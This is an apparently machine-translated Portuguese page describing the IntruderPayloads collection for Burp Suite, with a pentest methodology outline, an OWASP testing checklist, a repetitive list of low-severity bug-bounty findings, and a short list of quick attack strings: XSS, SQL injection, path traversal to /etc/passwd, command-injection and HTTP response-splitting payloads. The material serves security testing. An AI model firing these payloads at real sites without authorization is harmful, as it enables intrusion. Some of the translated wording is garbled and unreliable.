NOTÍCIAS

[ANONYMOUS][grids]

IntruderPayloads - Uma coleção de cargas úteis de intrusão Burpsuite, listas de fuzz e carregamentos de arquivos

IntruderPayloads

Uma coleção de cargas úteis de Burpsuite Intruder e listas de fuzz e metodologia pentesting. Para retirar todos os reposes de terceiros, execute install.sh no mesmo diretório da pasta IntruderPayloads. 
  • Burpsuite Spider com apresentação inteligente de formulários
  • Rastreamento manual do site através do proxy do Burpsuite e envio de cargas úteis INJECTX para rastreamento
  • Varredura passiva Burpsuite
  • Ferramentas de noivado Burpsuite> Pesquisa> <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
  • Ferramentas de engajamento Burpsuite> Encontrar comentários
  • Ferramentas de engajamento Burpsuite> Encontre scripts
  • Ferramentas de engajamento Burpsuite> Encontrar referências
  • Ferramentas de engajamento Burpsuite> Analise o alvo
  • Ferramentas de engajamento Burpsuite> Descubra o conteúdo
  • Burpsuite Intruder> arquivo / diretório força bruta
  • Burpsuite Intruder> métodos HTTP, agentes de usuários, etc.
  • Enumerar todas as tecnologias de software, métodos HTTP e potenciais vetores de ataque
  • Compreender a função do site, quais tipos de dados são armazenados ou valiosos e que tipo de funções atacar, etc.
NUMERAÇÃO:
  • SISTEMA OPERACIONAL
  • SERVIDOR WEB
  • SERVIDORES DE BASE DE DADOS
  • LINGUAGENS DE PROGRAMAÇÃO
  • PLUGINS / VERSÕES
  • PORTOS ABERTOS
  • USERNAMES
  • SERVIÇOS
  • WEB SPIDERING
  • GOOGLE HACKING

VECTORES:
  • FORMULÁRIOS DE ENTRADA
  • GET / POST PARAMS
  • URI / REST STRUCTURE
  • BISCOITOS
  • HEADERS

QUADROS DE PESQUISA:
Apenas alguns termos regex úteis para pesquisar passivamente usando o Burpsuite ou qualquer outro proxy da Web ...
fname|phone|id|org_name|name|email

QUICK ATTACK STRINGS:
não é uma lista completa por qualquer meio, mas quando você está testando manualmente e andando por sites e precisa de uma cópia / pasta rápida, isso pode ser útil ...
Company
First Last
username
[email protected]
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt.png
https://google.com/.injectx/rfi_vuln.txt.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' -- 
"></textarea><img/onload=alert(1)>' -- 
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!-- 
"><img/onload=alert(1)>' -- // INJECTX <!-- 
INJECTX'"><h1>X<!-- 
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"-- 
admin' or '1'='1'-- 
firstlastcompany%0a%0d

LISTA DE VERIFICAÇÃO DE TESTES OWASP:
  • Aranhas, Robôs e Crawlers IG-001
  • Descoberta / Reconhecimento do Search Engine IG-002
  • Identificar os pontos de entrada do aplicativo IG-003
  • Teste de Aplicação Web Fingerprint IG-004
  • Descoberta de Aplicação IG-005
  • Análise de códigos de erro IG-006
  • Teste SSL / TLS (Versão SSL, Algoritmos, Comprimento da chave, Cert. Digital) Validade) - Fraqueza SSL CM-001
  • DB Listener Testing - DB Ouvinte fraco CM-002
  • Testes de Gerenciamento de Configuração de Infraestrutura - Fracasso de Gerenciamento de Configuração de Infra-estrutura
  • Teste de Gerenciamento de Configuração de Aplicação - Gerenciamento de Configuração de Aplicativos fraqueza CM-004
  • Testando o Gerenciamento de Extensões de Arquivo - Processamento de extensões de arquivo CM-005
  • Arquivos antigos, de backup e não referenciados - Arquivos antigos, de backup e não referenciados CM-006
  • Interfaces de infraestrutura e administração de aplicativos - Acesso às interfaces de administração CM-007
  • Testando Métodos HTTP e XST - Métodos HTTP habilitados, XST permitido, Verbo HTTP CM-008
  • Transporte de credenciais através de um canal criptografado - Transporte de credenciais através de um canal criptografado AT-001
  • Testes para enumeração de usuários - Enumeração de usuários AT-002
  • Testando para a conta de usuário Guessable (Dicionário) - Conta de usuário susceptível de AT-003
  • Teste de Força Bruta - Credenciais Forçamento Bruto AT-004
  • Teste para ignorar o esquema de autenticação - Ignorando o esquema de autenticação AT-005
  • Teste de senha de lembrança vulnerável e reinicialização de pwd - Senha de lembrança vulnerável, reset de pwd fraco AT-006
  • Teste de Logout e Gerenciamento de cache do navegador - - Função de logout não implementada corretamente, fraqueza de cache do navegador AT-007
  • Testes para CAPTCHA - Implementação do Captcha fraco AT-008
  • Teste de autenticação de múltiplos fatores - Autenticação de fatores múltiplos fracos AT-009
  • Teste de condições de corrida - vulnerabilidade de condições de corrida AT-010
  • Testando o Esquema de Gerenciamento de Sessão - Ignorando o Esquema de Gerenciamento de Sessão, Token de Sessão Fraca SM-001
  • Atestados de Teste de Cookies - Os cookies são definidos não apenas 'HTTP Only', 'Seguro' e sem tempo de validade SM-002
  • Teste de Fixação de Sessão - Fixação de Sessão SM-003
  • Teste de Variáveis ​​de Sessão Expostas - Variáveis ​​de sessão sensíveis expostas SM-004
  • Testes para CSRF - CSRF SM-005
  • Teste de Path Traversal - Path Traversal AZ-001
  • Teste para ignorar o esquema de autorização - Ignorar o esquema de autorização AZ-002
  • Teste de Escalação Privilegiada - Escalação Privilegiada AZ-003
  • Testing for Business Logic - lógica de negócios de bloqueio BL-001
  • Testes para o Criptografado Cross Site Scripting - XSS DV-001 refletido
  • Teste de Stored Cross Site Scripting - armazenado XSS DV-002
  • Testando scripts baseados no site do DOM - DOM XSS DV-003
  • Teste de Cross Site Flashing - Cross Site Flashing DV-004
  • SQL Injection - SQL Injection DV-005
  • Injeção LDAP - Injeção LDAP DV-006
  • Injeção de ORM - Injeção de ORM DV-007
  • Injeção XML - Injeção XML DV-008
  • Injeção SSI - Injeção SSI DV-009
  • Injeção XPath - Injeção XPath DV-010
  • Injeção IMAP / SMTP - Injeção IMAP / SMTP DV-011
  • Injeção de código - Injeção de código DV-012
  • Comando do SO - Comando do SO DV-013
  • Desbordamento de buffer: estouro de buffer DV-014
  • Vulnerabilidade incubada - Vulnerabilidade incubada DV-015
  • Teste de Divisão / Contrabando HTTP - Divisão HTTP, Contrabando DV-016
  • Teste de ataques de curinga SQL - vulnerabilidade de curinga SQL DS-001
  • Bloqueando contas de clientes - Bloqueando contas de clientes DS-002
  • Testes para transbordamentos do buffer do DoS - buffer overflows DS-003
  • Alocação de objeto especificado pelo usuário - Alocação de objeto especificada pelo usuário DS-004
  • Entrada do usuário como um contador de loop - Entrada do usuário como um contador de loop DS-005
  • Escrevendo dados fornecidos pelo usuário ao disco - Escrevendo dados fornecidos pelo usuário ao disco DS-006
  • Falha na liberação de recursos - Falha na liberação de recursos DS-007
  • Armazenando muito dados na sessão - Armazenando muito dados na sessão DS-008
  • WS Information Gathering - NA WS-001
  • Testando WSDL - WSDL Fraqueza WS-002
  • Teste Estrutural XML - Estrutura XML Fraca WS-003
  • Teste de nível de conteúdo XML - nível de conteúdo XML WS-004
  • HTTP GET parameters / REST Testing - WS HTTP GET parameters / REST WS-005
  • Naughty SOAP anexos - WS Naughty SOAP anexos WS-006
  • Testes de repetição - WS Replay Testing WS-007
  • Vulnerabilidades AJAX - NA AJ-001
  • AJAX Testing - AJAX fraqueza AJ-002

BAIXA SEVERIDADE:
uma lista de descobertas de baixa gravidade que provavelmente estão fora do escopo para a maioria dos programas de recompensas de insetos, mas ainda são úteis para fazer referência para testes normais de penetração na web.
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Divulgação de Banner sobre serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Click-Jacking e problemas apenas exploráveis ​​através de cliques.
  • CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Falta de bandeiras de cookie seguras e HTTPOnly.
  • Falta de Segurança Speedbump ao sair do site.
  • Débito Captcha / Captcha Fraco
  • Enumeração de nome de usuário via Login Página mensagem de erro
  • Enumeração de nome de usuário via Senha esquecida, mensagem de erro
  • Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
  • Método HTTP OPTIONS / TRACE habilitado
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de criptografia SSL Insegáveis
  • O cabeçalho anti-MIME-Sniffing X-Content-Type-Options
  • Falta cabeçalhos de segurança HTTP
  • Melhores práticas de segurança sem acompanhar a exploração de prova de conceito
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Ataques de negação de serviço.
  • Fingerprinting / banner divulgação em serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Clickjacking e problemas apenas exploráveis ​​através do clique.
  • CSRF em formulários não sensíveis.
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Falta de sinalizadores seguros / HTTPOnly em cookies não-sensíveis.
  • Falta de Segurança Speedbump ao sair do site.
  • Débito Captcha / Captcha Fraco
  • Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
  • OPÇÕES Método HTTP habilitado
  • Scripts de conteúdo misto HTTPS
  • Bibliotecas vulneráveis ​​conhecidas
  • Ataques em serviços de anúncios de terceiros
  • Enumeração de nome de usuário / e-mail via Senha esquecida ou Página de login
  • Falta cabeçalhos de segurança HTTP
  • Strict-Transport-Security não habilitado para HTTPS
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
  • Conteúdo-Segurança-Política-relatório somente
  • Problemas SSL, por exemplo,
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de cifra fracos / inseguras SSL
  • Falta de registros SPF (Spoofing por e-mail)
  • Auto-completar habilitado nos campos de senha
  • HTTP habilitado
  • ID de sessão ou Login Sent Over HTTP
  • Cookies inseguros
  • Cross-Domain.xml permite todos os domínios
  • Domínios permitidos HTML5
  • Política de origem cruzada
  • Content Sniffing Not Disabled
  • Enumeração de conta de redefinição de senha
  • Abuso de Formulário HTML (Negação de Serviço)
  • Idade do HSTS fraca (86,000 ou menos)
  • Falta de Política de Segurança de Senha (Senhas Forçadas Brutas)
  • Teste físico
  • Ataques de negação de serviço
  • Ataques de Exaustão de Recursos
  • Questões relacionadas à limitação de taxa
  • Login ou Forgot Password página força bruta e bloqueio de conta não aplicado
  • api * .netflix.com escuta na porta 80
  • Política de acesso entre domínios abrangida por * .netflix.com
  • Nome de usuário / Enumeração de e-mail
  • via mensagem de erro da Página de Login
  • via mensagem de erro Esqueceu a senha
  • via registro
  • senha fraca
  • Passagem fraca Captcha / Captcha
  • Falta de sinalizadores seguros / HTTPOnly em cookies
  • Cookie válido após o fim de sessão
  • Cookie válido após a reinicialização da senha
  • Vencimento de cookies
  • Esqueceu a senha autologin
  • Reutilização token Autologin
  • Script do mesmo site
  • Problemas SSL, por exemplo,
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de cifra fracos / inseguras SSL
  • Vulnerabilidades SSL relacionadas à configuração ou versão
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Fingerprinting / banner divulgação em serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Clickjacking e problemas apenas exploráveis ​​através do clique.
  • CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Falta a proteção CSRF na funcionalidade não-sensível
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Charset incorreto
  • Autocompletar HTML
  • OPÇÕES Método HTTP habilitado
  • Método TRACE HTTP habilitado
  • Faltando cabeçalhos de segurança HTTP, especificamente
  • https://www.owasp.org/index.php/List_of_useful_HTTP_headers ), por exemplo,
  • Strict-Transport-Security
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
  • Conteúdo-Segurança-Política-relatório somente
  • Problemas apenas presentes em navegadores antigos / antigos plugins / navegadores de software de fim de vida
  • IE <9
  • Chrome <40
  • Firefox <35
  • Safari <7
  • Opera <13
  • Relatórios de vulnerabilidade relacionados aos números de versão relatados de servidores web, serviços ou frameworks